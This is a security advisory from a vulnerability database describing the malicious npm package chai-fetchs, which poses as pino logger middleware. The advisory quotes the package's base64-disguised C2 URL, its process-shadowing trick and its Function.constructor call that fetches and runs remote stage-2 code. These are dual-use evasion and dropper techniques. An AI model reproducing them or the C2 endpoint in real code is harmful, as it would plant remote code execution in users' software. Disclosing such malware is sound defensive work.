VDB

GCVE-110-OSM-2026-3462

GCVE-110-OSM-2026-3462
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published May 1, 2026
Executes attacker-controlled stage-2 JavaScript by fetching from C2 endpoint `https://index-1fc9a4.tiiny.site/index.json` and running the response via `Function.constructor("require", payload)(require)`, granting the remote payload unrestricted Node.js access. The package uses a process module shadowing technique — `lib/const.js` exports hardcoded base64-encoded C2 credentials disguised as environment variable names (`DEV_API_KEY`, `DEV_SECRET_KEY`, `DEV_SECRET_VALUE`), which `lib/caller.js` decodes at runtime to contact the attacker infrastructure. Masquerades as a pino logger middleware with 41 copied legitimate files as camouflage; dropper logic is confined to two files. **Trigger**: exports a middleware function; dropper fires on first middleware invocation (e.g. `app.use(chaiFetchs())`). **Process shadowing**: `lib/caller.js` imports `require('./const')` aliased as `process`, replacing Node's global `process.env` with a fake env object — ensuring hardcoded attacker values are always used regardless of the victim's actual environment. **Credential store** (`lib/const.js`): `DEV_API_KEY: "aHR0cHM6Ly9pbmRleC0xZmM5YTQudGlpbnkuc2l0ZS9pbmRleC5qc29u"` (base64 → C2 URL), `DEV_SECRET_KEY: "ZGV2LXNlY3JldC1rZXk="` (base64 → `dev-secret-key`), `DEV_SECRET_VALUE: "Xw=="` (base64 → `_`). **C2 fetch** (`lib/caller.js` lines 9–15): `const src = atob(process.env.DEV_API_KEY)` decodes to `https://index-1fc9a4.tiiny.site/index.json`; GET request sent with header `dev-secret-key: _`; stage-2 payload extracted from `response.data.cookie`. **Stage-2 execution**: `new Function.constructor("require", s); handler(require)` — eval-equivalent bypassing naive `eval()` detection, granting the payload full access to all Node.js built-in modules. **Resilience**: retries C2 fetch up to 5 times before aborting.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownchai-fetchs3.1.9 (affected)

References

vendor

Browse GCVE Records

73,685 records in the GCVE database · Updated July 18, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›